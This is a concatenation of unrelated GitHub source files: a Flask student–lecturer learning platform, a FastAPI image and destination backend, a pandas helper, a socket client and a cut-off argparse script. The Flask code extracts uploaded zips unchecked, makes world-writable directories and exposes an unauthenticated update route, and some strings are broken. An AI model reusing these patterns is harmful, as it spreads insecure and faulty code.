db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n phone = db.Column(db.Integer(),\n nullable=False)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, remember_token=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Users(db.Model):\n __tablename__= 'users'\n id = db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n phone = db.Column(db.Integer(),\n nullable=False)\n photo = db.Column(db.String(128), \n nullable=True)\n year = db.Column(db.String(40),\n nullable=True)\n teachers = db.Column(db.String(128), \n nullable=True)\n email_verified = db.Column(db.SmallInteger(),\n default=0)\n admin_verified = db.Column(db.SmallInteger(),\n default=0)\n google_provider_id = db.Column(db.String(128), \n nullable=True)\n facebook_provider_id = db.Column(db.String(128), \n nullable=True)\n batch_ids = db.Column(db.String(128), \n nullable=True)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, year=None, google_provider_id=None,\n facebook_provider_id=None, batch_ids=None, remember_token=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n if year:\n self.year=year\n if(google_provider_id):\n self.google_provider_id = google_provider_id\n if(facebook_provider_id):\n self.facebook_provider_id = facebook_provider_id\n if(batch_ids):\n self.batch_ids = batch_ids\n if(remember_token):\n self.remember_token = remember_token\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Lecturers(db.Model):\n __tablename__= 'lecturers'\n id = db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n 
phone = db.Column(db.Integer(),\n nullable=False)\n photo = db.Column(db.String(128), \n nullable=True)\n designation = db.Column(db.String(128),\n nullable=True)\n education = db.Column(db.String(128),\n nullable=True)\n skills = db.Column(db.String(255),\n nullable=True)\n about = db.Column(db.String(1024),\n nullable=True)\n experience = db.Column(db.String(1024),\n nullable=True)\n achievements = db.Column(db.String(1024),\n nullable=True)\n students_request = db.Column(db.String(128),\n nullable=True)\n linkedin = db.Column(db.String(255),\n nullable=True)\n github = db.Column(db.String(255),\n nullable=True)\n youtube = db.Column(db.String(255),\n nullable=True)\n email_verified = db.Column(db.SmallInteger(),\n default=0)\n google_provider_id = db.Column(db.String(128), \n nullable=True)\n facebook_provider_id = db.Column(db.String(128), \n nullable=True)\n batch_ids = db.Column(db.String(128), \n nullable=True)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, designation, \n education, google_provider_id=None, facebook_provider_id=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n self.designation = designation\n self.education = education\n if(google_provider_id):\n self.google_provider_id = google_provider_id\n if(facebook_provider_id):\n self.facebook_provider_id = facebook_provider_id\n\n def __repr__(self):\n return '' % self.email\n\n\n\nclass Assignments(db.Model):\n __tablename__= 'assignments'\n id = db.Column(db.Integer, \n primary_key=True)\n lecturer_id = db.Column(db.Integer,\n nullable=False)\n topic_name = db.Column(db.String(255), \n index=False, \n nullable=False)\n path = db.Column(db.String(128), \n nullable=False)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, lecturer_id, topic_name, path):\n self.lecturer_id = lecturer_id\n self.topic_name = topic_name\n self.path = path\n\n def __repr__(self):\n return '' % self.path\n\n\n\n\ndef create_user(req: 'flask_request') -> bool:\n try:\n name = str(req.form['name'])\n email = str(req.form['email'])\n password = str(sha256_crypt.hash(req.form['psw']))\n phone = int(req.form['phone'])\n year = str(req.form['year'])\n if year != \"\":\n user = Users(name,email,password,phone,year)\n else:\n user = Users(name,email,password,phone)\n db.session.add(user)\n db.session.commit()\n return True \n\n except Exception:\n return False\n\n\ndef create_lecturer(req: 'flask_request') -> bool:\n try:\n name = str(req.form['name'])\n email = str(req.form['email'])\n password = str(sha256_crypt.hash(req.form['psw']))\n phone = int(req.form['phone'])\n designation = str(req.form['designation'])\n education = str(req.form['education'])\n lecturer = Lecturers(name,email,password,phone,designation,education)\n db.session.add(lecturer)\n db.session.commit()\n return True \n except Exception:\n return False\n\n\n\n@app.route('/update')\ndef update_user() -> bool:\n try:\n update = Users.query.filter_by(email=\"zxcv@gmail.com\").first()\n update.name = \"zxcv\"\n db.session.commit()\n return 'True'\n except Exception:\n return 'False'\n\n\ndef login_credential_check(req: 'flask_request') -> bool:\n try:\n username = str(req.form['username'])\n password = str(req.form['pass'])\n user = 
Users.query.filter_by(email=username).first()\n if user.email == username and sha256_crypt.verify(password, user.password):\n session['tarang_username'] = user.email\n session['student_id'] = user.id\n return True\n else:\n return False\n except Exception:\n return False\n\n\ndef lecturer_login_credential_check(req: 'flask_request') -> bool:\n try:\n username = str(req.form['username'])\n password = str(req.form['pass'])\n lecturer = Lecturers.query.filter_by(email=username).first()\n if lecturer.email == username and sha256_crypt.verify(password, lecturer.password):\n session['lecturer_username'] = lecturer.email\n session['lecturer_id'] = lecturer.id\n return True\n else:\n return False\n except Exception as e:\n raise e\n\n\n# student section\n\n@app.route('/')\n@app.route('/login')\ndef students_login() -> 'html':\n if 'tarang_username' in session:\n return redirect(url_for('dashboard'))\n return render_template('login.html', the_title='Students Login - Tarang')\n\n\n@app.route('/login_success', methods = ['POST', 'GET'])\ndef login_success():\n if request.method == 'POST':\n user = login_credential_check(request)\n if user != False:\n return redirect(url_for('dashboard'))\n else:\n flash('Login credentials do not match')\n return redirect('/login')\n\n return redirect('/login')\n\n\n\n@app.route('/signup')\ndef students_signup() -> 'html':\n return render_template('signup.html',\n the_title='Students Sign Up - Tarang')\n\n\n@app.route('/signup_success', methods = ['POST', 'GET'])\ndef signup_success():\n if request.method == 'POST':\n boolean = create_user(request)\n if boolean == True:\n flash('Successfully sign up, you can login now')\n return redirect('/login')\n else:\n flash('Error occurred ! Please try again')\n return redirect('/signup')\n\n\n@app.route('/logout')\ndef logout():\n session.pop('tarang_username', None)\n session.pop('student_id', None)\n return redirect('login')\n \n\n\n@app.route('/ForgotPassword')\ndef ForgotPassword() -> 'html':\n return render_template('ForgotPassword.html',\n the_title='Forgot Password - Tarang')\n\n@app.route('/dashboard')\ndef dashboard() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n return render_template('dashboard/index.html',\n the_title='Students Dashboard - Tarang',\n user=user)\n\n\n@app.route('/notes')\ndef notes() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n notes = Assignments.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/notes.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n notes=notes,\n request_accepted=request_accepted)\n\n@app.route('/notes/')\ndef lecturer_notes(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n notes = Assignments.query.filter_by(lecturer_id=id).all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/lecturer_notes.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n notes=notes,\n lecturer_id=int(id),\n request_accepted=request_accepted)\n\n\n\n@app.route('/note/')\ndef note(id) -> 'html':\n if 'tarang_username' not in session:\n 
return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n assignment = Assignments.query.filter_by(id=id).first()\n lecturer = Lecturers.query.filter_by(id=assignment.lecturer_id).first()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/note.html',\n the_title='Note - Tarang',\n user=user,\n id=int(id),\n assignment=assignment,\n lecturer=lecturer,\n request_accepted=request_accepted)\n\n\n\n@app.route('/tests')\ndef tests() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n tests = Assignments.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/tests.html',\n the_title='Tests - Tarang',\n user=user,\n lecturers=lecturers,\n tests=tests,\n request_accepted=request_accepted)\n\n\n\n@app.route('/tests/')\ndef lecturer_tests(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n tests = Assignments.query.filter_by(lecturer_id=id).all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/lecturer_tests.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n tests=tests,\n lecturer_id=int(id),\n request_accepted=request_accepted)\n\n\n\n@app.route('/test/')\ndef test(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n assignment = Assignments.query.filter_by(id=id).first()\n lecturer = Lecturers.query.filter_by(id=assignment.lecturer_id).first()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/test.html',\n the_title='Test - Tarang',\n user=user,\n id=int(id),\n assignment=assignment,\n lecturer=lecturer,\n request_accepted=request_accepted)\n\n\n\n@app.route('/lecturers')\ndef lecturers() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n request_sent = []\n for lecturer in lecturers:\n if lecturer.students_request != None and user.id in [int(i) for i in lecturer.students_request.split(',')]:\n request_sent.append(lecturer.id)\n\n return render_template('dashboard/teachers.html',\n the_title='Lecturers - Tarang',\n user=user,\n lecturers=lecturers,\n request_accepted=request_accepted,\n request_sent=request_sent)\n\n\n@app.route('/lecturer_info/')\ndef lecturer_info(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n request_sent = []\n for lect in lecturers:\n if lect.students_request != None and user.id in [int(i) for i in lect.students_request.split(',')]:\n request_sent.append(lect.id)\n\n lecturer = Lecturers.query.filter_by(id=id).first() \n return render_template('dashboard/teacher_info.html',\n the_title='Lecturer - Tarang',\n user=user,\n lecturers=lecturers,\n lecturer=lecturer,\n 
request_accepted=request_accepted,\n request_sent=request_sent)\n\n\n@app.route('/send_request/')\ndef send_request(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n lecturer = Lecturers.query.filter_by(id=id).first()\n if lecturer.students_request != None:\n students_request = [int(i) for i in lecturer.students_request.split(',')]\n students_request.append(session['student_id'])\n students_request = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request\n db.session.commit()\n else:\n lecturer.students_request = str(session['student_id'])\n db.session.commit()\n\n return redirect('/lecturers')\n\n\n@app.route('/cancel_request/')\ndef cancel_request(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n lecturer = Lecturers.query.filter_by(id=id).first()\n\n students_request = [int(i) for i in lecturer.students_request.split(',')]\n students_request.remove(session['student_id'])\n if students_request != []:\n students_request = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request\n db.session.commit()\n else:\n lecturer.students_request = None\n db.session.commit()\n\n return redirect('/lecturers')\n\n\n\n@app.route('/results')\ndef results() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n return render_template('dashboard/results.html',\n the_title='Test Results - Tarang',\n user=user)\n\n\n\n# Lecturer section\n@app.route('/lecturer')\n@app.route('/lecturer/login')\ndef lecturer_login() -> 'html':\n if 'lecturer_username' in session:\n return redirect(url_for('lecturer_dashboard'))\n return render_template('lecturer_login.html', the_title='Lecturers Login - Tarang')\n\n\n@app.route('/lecturer_login_success', methods = ['POST', 'GET'])\ndef lecturer_login_success():\n if request.method == 'POST':\n lecturer = lecturer_login_credential_check(request)\n if lecturer == True:\n return redirect(url_for('lecturer_dashboard'))\n else:\n flash('Login credentials do not match')\n return redirect('/lecturer/login')\n\n return redirect('/lecturer/login')\n\n\n\n@app.route('/lecturer/signup')\ndef lecturer_signup() -> 'html':\n return render_template('lecturer_signup.html',\n the_title='Lecturers Sign Up - Tarang')\n\n\n@app.route('/lecturer/signup_success', methods = ['POST', 'GET'])\ndef lecturer_signup_success():\n if request.method == 'POST':\n boolean = create_lecturer(request)\n if boolean == True:\n flash('Successfully sign up, you can login now')\n return redirect('/lecturer/login')\n else:\n flash('Error occurred ! 
Please try again')\n            return redirect('/lecturer/signup')\n\n\n@app.route('/lecturer/logout')\ndef lecturer_logout():\n    session.pop('lecturer_username', None)\n    session.pop('lecturer_id', None)\n    return redirect('/lecturer/login')\n    \n\n\n@app.route('/lecturer/ForgotPassword')\ndef LecturerForgotPassword() -> 'html':\n    return render_template('LecturerForgotPassword.html',\n                            the_title='Forgot Password - Tarang')\n\n\n@app.route('/lecturer/dashboard')\ndef lecturer_dashboard() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        return render_template('dashboard/lecturer_index.html',\n                                the_title='Lecturer Dashboard - Tarang',\n                                lecturer=lecturer)\n\n\n\n@app.route('/lecturer/edit_dashboard')\ndef lecturer_edit_dashboard() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        return render_template('dashboard/lecturer_edit_dashboard.html',\n                                the_title='Edit - Tarang',\n                                lecturer=lecturer)\n\n\n@app.route('/lecturer/edit_dashboard_success', methods = ['GET','POST'])\ndef lecturer_edit_dashboard_success() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    elif request.method == 'POST':\n        try:\n            lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n            lecturer.name = request.form['name']\n            lecturer.phone = request.form['phone']\n            lecturer.designation = request.form['designation']\n            lecturer.education = request.form['education']\n            if request.form['skills'] != None:\n                lecturer.skills = request.form['skills']\n            if request.form['about'] != None: \n                lecturer.about = request.form['about']\n            if request.form['experience'] != None:\n                lecturer.experience = request.form['experience']\n            if request.form['achievements'] != None:\n                lecturer.achievements = request.form['achievements']\n            if request.form['linkedin'] != None:\n                lecturer.linkedin = request.form['linkedin']\n            if request.form['github'] != None:\n                lecturer.github = request.form['github']\n            if request.form['youtube'] != None:\n                lecturer.youtube = request.form['youtube']\n            db.session.commit()\n            return redirect('/lecturer/dashboard')\n        except Exception:\n            return redirect('/lecturer/dashboard')\n\n\n\n@app.route('/lecturer/assignments')\ndef lecturer_assignments() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        assignments = Assignments.query.filter_by(lecturer_id=lecturer.id).all()\n        return render_template('dashboard/lecturer_assignments.html',\n                                the_title='Lecturer Assignments - Tarang',\n                                lecturer=lecturer,\n                                assignments=assignments)\n\n\n\n@app.route('/lecturer/create_assignment')\ndef lecturer_create_assignment() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        return render_template('dashboard/create_assignment.html',\n                                the_title='Create Assignments - Tarang',\n                                lecturer=lecturer)\n\n\n@app.route('/lecturer/create_assignment_success', methods = ['POST', 'GET'])\ndef lecturer_create_assignment_success() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    elif request.method == 'POST':\n        try:\n            directory = str(randint(1000000000, 
9999999999))\n            parent_dir = \"./static/uploads\"\n            path = os.path.join(parent_dir, directory)\n            os.mkdir(path, 0o777)\n            app.config['UPLOAD_FOLDER'] = path\n            file = request.files['zip_file']\n            file_name = secure_filename(file.filename)\n            filename = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n            file.save(filename)\n            with zipfile.ZipFile(filename, 'r') as zip_ref:\n                zip_ref.extractall(path)\n\n            lecturer_id = request.form['lecturer_id']\n            topic_name = str(request.form['topic_name'])\n            path = \"uploads/\" + directory + \"/\" + file_name.split('.')[0]\n            assignment = Assignments(lecturer_id,topic_name,path)\n            db.session.add(assignment)\n            db.session.commit()\n            flash('Successfully created an assignment')\n            return redirect('/lecturer/assignments')\n        except Exception:\n            flash('Error occurred! Please try again')\n            return redirect('/lecturer/create_assignment')\n    else:\n        flash('Error occurred! Please try again')\n        return redirect('/lecturer/create_assignment')\n\n\n@app.route('/lecturer/edit_assignment/<id>')\ndef lecturer_edit_assignment(id) -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        assignment = Assignments.query.filter_by(id=id).first()\n        return render_template('dashboard/edit_assignment.html',\n                               the_title='Edit Assignment - Tarang',\n                               assignment=assignment)\n\n\n@app.route('/lecturer/edit_assignment_success', methods=['POST', 'GET'])\ndef lecturer_edit_assignment_success() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    elif request.method == 'POST':\n        try:\n            update_assignment = Assignments.query.filter_by(id=request.form['assignment_id']).first()\n            update_assignment.topic_name = request.form['topic_name']\n            db.session.commit()\n            return redirect('/lecturer/assignments')\n        except Exception:\n            return redirect('/lecturer/assignments')\n\n\n@app.route('/lecturer/delete_assignment/<id>')\ndef lecturer_delete_assignment(id) -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        try:\n            assignment = Assignments.query.filter_by(id=id).first()\n            db.session.delete(assignment)\n            db.session.commit()\n            return redirect('/lecturer/assignments')\n        except Exception:\n            return redirect('/lecturer/assignments')\n\n\n@app.route('/lecturer/students')\ndef lecturer_students() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        students = Users.query.all()\n        students_id = []\n        for student in students:\n            if student.teachers is not None and lecturer.id in [int(i) for i in student.teachers.split(',')]:\n                students_id.append(student.id)\n\n        return render_template('dashboard/lecturer_students.html',\n                               the_title='All Students - Tarang',\n                               lecturer=lecturer,\n                               students=students,\n                               students_id=students_id)\n\n\n@app.route('/lecturer/student_remove/<id>')\ndef lecturer_student_remove(id) -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        student = Users.query.filter_by(id=id).first()\n        teachers_list = list(set([int(i) for i in student.teachers.split(',')]))\n        teachers_list.remove(session['lecturer_id'])\n        if teachers_list:\n            teachers_str = ','.join(str(i) for i in teachers_list)\n            student.teachers = teachers_str\n            db.session.commit()\n        else:\n            student.teachers = None\n            db.session.commit()\n        return redirect('/lecturer/students')\n\n\n@app.route('/lecturer/studentsrequest')\ndef lecturer_studentsrequest() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        students = Users.query.all()\n        students_request = []\n        if lecturer.students_request:\n            students_request = list(set([int(i) for i in lecturer.students_request.split(',')]))\n        return render_template('dashboard/lecturer_studentsrequest.html',\n                               the_title='New Students Request - Tarang',\n                               lecturer=lecturer,\n                               students=students,\n                               students_request=students_request)\n\n\n@app.route('/lecturer/student_request_accept/<id>')\ndef lecturer_student_request_accept(id) -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        student = Users.query.filter_by(id=id).first()\n        lecturer = Lecturers.query.filter_by(id=session['lecturer_id']).first()\n        students_request = list(set([int(i) for i in lecturer.students_request.split(',')]))\n        students_request.remove(int(id))\n        if students_request:\n            students_request_str = ','.join(str(i) for i in students_request)\n            lecturer.students_request = students_request_str\n            db.session.commit()\n        else:\n            lecturer.students_request = None\n            db.session.commit()\n\n        if student.teachers:\n            teachers_list = list(set([int(i) for i in student.teachers.split(',')]))\n            teachers_list.append(lecturer.id)\n            teachers_str = ','.join(str(i) for i in teachers_list)\n            student.teachers = teachers_str\n            db.session.commit()\n        else:\n            student.teachers = str(lecturer.id)\n            db.session.commit()\n\n        return redirect('/lecturer/studentsrequest')\n\n\n@app.route('/lecturer/student_request_deny/<id>')\ndef lecturer_student_request_deny(id) -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(id=session['lecturer_id']).first()\n        students_request = list(set([int(i) for i in lecturer.students_request.split(',')]))\n        students_request.remove(int(id))\n        if students_request:\n            students_request_str = ','.join(str(i) for i in students_request)\n            lecturer.students_request = students_request_str\n            db.session.commit()\n        else:\n            lecturer.students_request = None\n            db.session.commit()\n        return redirect('/lecturer/studentsrequest')\n\n\n@app.route('/lecturer/results')\ndef lecturer_results() -> 'html':\n    if 'lecturer_username' not in session:\n        return redirect('/lecturer/login')\n    else:\n        lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n        return render_template('dashboard/lecturer_results.html',\n                               the_title='Students Results - Tarang',\n                               lecturer=lecturer)\n\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"vda4117/tarang","sub_path":"tarang/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":31352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"5602719712","text":"from fastapi import FastAPI, UploadFile, File, Request\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nimport sqlite3\nimport datetime\nfrom starlette.responses import FileResponse\nfrom starlette.staticfiles import StaticFiles\nfrom pytz import timezone\nfrom PIL import Image\nimport io\nimport uuid\nimport os\n\n\nTIME_FORMAT = \"%Y-%m-%d_%H:%M:%S\"\nKST = timezone(\"Asia/Seoul\")\n\n\nclass Item(BaseModel):\n    cam_id: int\n    x: float\n    y: float\n    z: float\n    w: float\n\n\ndef get_image_time() -> tuple:\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\"SELECT * FROM image_table ORDER BY id DESC LIMIT 1\")\n    result = c.fetchone()\n    conn.close()\n\n    image_dict = dict(zip([x[0] for x in c.description], result))\n\n    return image_dict[\"path\"], image_dict[\"time\"]\n\n\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"))\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\")\nasync def read_index(request: Request):\n    image_path, time = get_image_time()\n    time = time.replace(\"_\", \" \")\n\n    return templates.TemplateResponse(\n        \"index.html\",\n        {\"request\": request, \"image\": image_path, \"time\": time},\n    )\n\n\n@app.get(\"/HRI\")\nasync def HRI():\n    return FileResponse(\"templates/HRI.html\")\n\n\n@app.get(\"/quit\")\ndef quit():\n    \"\"\"\n    On GET /quit, insert the current time into quit_table in database.db.\n    \"\"\"\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\n        \"INSERT INTO quit_table (time) VALUES (?)\",\n        (datetime.datetime.now(KST).strftime(TIME_FORMAT),),\n    )\n    conn.commit()\n    conn.close()\n\n    return {\"message\": \"success\"}\n\n\n@app.get(\"/get_quit\")\ndef get_quit():\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\"SELECT * FROM quit_table ORDER BY id DESC LIMIT 1\")\n    result = c.fetchone()\n    conn.close()\n\n    quit_dict = dict(zip([x[0] for x in c.description], result))\n\n    return quit_dict\n\n\n@app.get(\"/arrive\")\ndef arrive():\n    \"\"\"\n    On GET /arrive, insert the current time into arrive_table in database.db.\n    \"\"\"\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\n        \"INSERT INTO arrive_table (time) VALUES (?)\",\n        (datetime.datetime.now(KST).strftime(TIME_FORMAT),),\n    )\n    conn.commit()\n    conn.close()\n\n    return {\"message\": \"success\"}\n\n\n@app.get(\"/get_arrive\")\ndef get_arrive():\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\"SELECT * FROM arrive_table ORDER BY id DESC LIMIT 1\")\n    result = c.fetchone()\n    conn.close()\n\n    arrive_dict = dict(zip([x[0] for x in c.description], result))\n\n    return arrive_dict\n\n\n@app.post(\"/upload_dest\")\ndef upload_dest(item: Item):\n    \"\"\"\n    On POST /upload_dest, receive the JSON payload\n    and insert it into dest_table in database.db.\n    \"\"\"\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\n        \"INSERT INTO dest_table (cam_id, x, y, z, w, time) VALUES (?, ?, ?, ?, ?, ?)\",  # noqa: E501\n        (\n            item.cam_id,\n            item.x,\n            item.y,\n            item.z,\n            item.w,\n            datetime.datetime.now(KST).strftime(TIME_FORMAT),\n        ),\n    )\n    conn.commit()\n    conn.close()\n    return {\"message\": \"success\"}\n\n\n@app.get(\"/get_dest\")\ndef get_dest():\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\"SELECT * FROM dest_table ORDER BY id DESC LIMIT 1\")\n    result = c.fetchone()\n    conn.close()\n\n    dest_dict = dict(zip([x[0] for x in c.description], result))\n\n    return dest_dict\n\n\n@app.post(\"/upload_image\")\nasync def upload_image(image: UploadFile = File(...)):\n    img = Image.open(io.BytesIO(await image.read()))\n\n    img_name = str(uuid.uuid4()) + \".jpg\"\n    img_path = os.path.join(\"static\", \"images\", \"fall\", img_name)\n\n    # save img to img_path\n    img.save(img_path)\n\n    conn = sqlite3.connect(\"database.db\")\n    c = conn.cursor()\n    c.execute(\n        \"INSERT INTO image_table (name, path, time) VALUES (?, ?, ?)\",  # noqa: E501\n        (\n            img_name,\n            img_path,\n            datetime.datetime.now(KST).strftime(TIME_FORMAT),\n        ),\n    )\n    conn.commit()\n    conn.close()\n\n    return {\"message\":
\"success\"}\n\n\n@app.get(\"/HRI_RETURN\")\nasync def HRI_RETURN():\n return FileResponse(\"templates/HRI_RETURN.html\")\n","repo_name":"ydoo123/capstone_design","sub_path":"myapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31657602345","text":"import pandas as pd\n\n\ndef get_dataframe_row(wordCount: {}, columns: [str]) -> [int]:\n row = []\n for entry in columns:\n if entry in wordCount:\n row.append(wordCount[entry])\n else:\n row.append(0)\n return row\n\n\ndef build_dataframe_without_topics(wordCounts, globalDictionary) -> pd.DataFrame:\n columns = [*globalDictionary]\n dataframe = pd.DataFrame(columns=columns)\n row_index = 1\n for key in wordCounts.keys():\n row = get_dataframe_row(wordCounts[key], columns)\n dataframe.loc[row_index] = row\n row_index += 1\n return dataframe\n\n\ndef add_column_to_dataframe(dataset: pd.DataFrame, columns) -> pd.DataFrame:\n column_dataframe = pd.DataFrame(columns[1:], columns=[columns[0]])\n return pd.concat([dataset, column_dataframe], axis=1)\n\n\ndef add_topics_to_dataset(dataset: pd.DataFrame, topics: {}) -> pd.DataFrame:\n columns = [\"topics\"]\n for key in topics.keys():\n topics_string = \"\"\n for topic in topics[key]:\n topics_string += topic + \",\"\n topics_string = topics_string[:-1]\n columns.append(topics_string)\n return add_column_to_dataframe(dataset, columns)\n","repo_name":"precupstefan/textmining","sub_path":"util/pd_util.py","file_name":"pd_util.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41513229728","text":"import socket\n\nHOST = '127.0.0.1' #접속할 서버 주소=> 서버에서 설정한 서버ip\nPORT = 8888 #서버에서 지정해 놓은 포트번호\n\n#소켓 객체를 생성\n#주소 체계로 IPv4, 소켓 타입으로 TCP 사용\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n#서버 accept()에 연결요청.\n#지정한 host와 port를 사용하여 서버에 접속\nclient_socket.connect((HOST, PORT))\n\n#무한 루프 돌기\nwhile True:\n message = input('message:') #서버로 보낼 메세지 입력\n client_socket.sendall(message.encode())\t#서버로 메세지를 전송\n\n data = client_socket.recv(1024) #서버로부터 데이터를 수신\n print('Received', data.decode()) #읽은 데이터 복호화\n if message=='/end': #/end입력시 서버, 클라이언트 모두 종료\n break\n\nclient_socket.close() #소켓 닫기","repo_name":"KIMGEONHWI/Tcp-Socket-Programming","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27782434226","text":"import argparse\n\ndef get_opts():\n parser = argparse.ArgumentParser()\n\n # Image path with help of argparse required=True\n parser.add_argument('--image_path', type=str, required=True, help='Path to image')\n\n # network structure with choices identity, mlp, pe\n parser.add_argument('--arch', type=str, default='identity', choices=['identity','pe'], help='Network 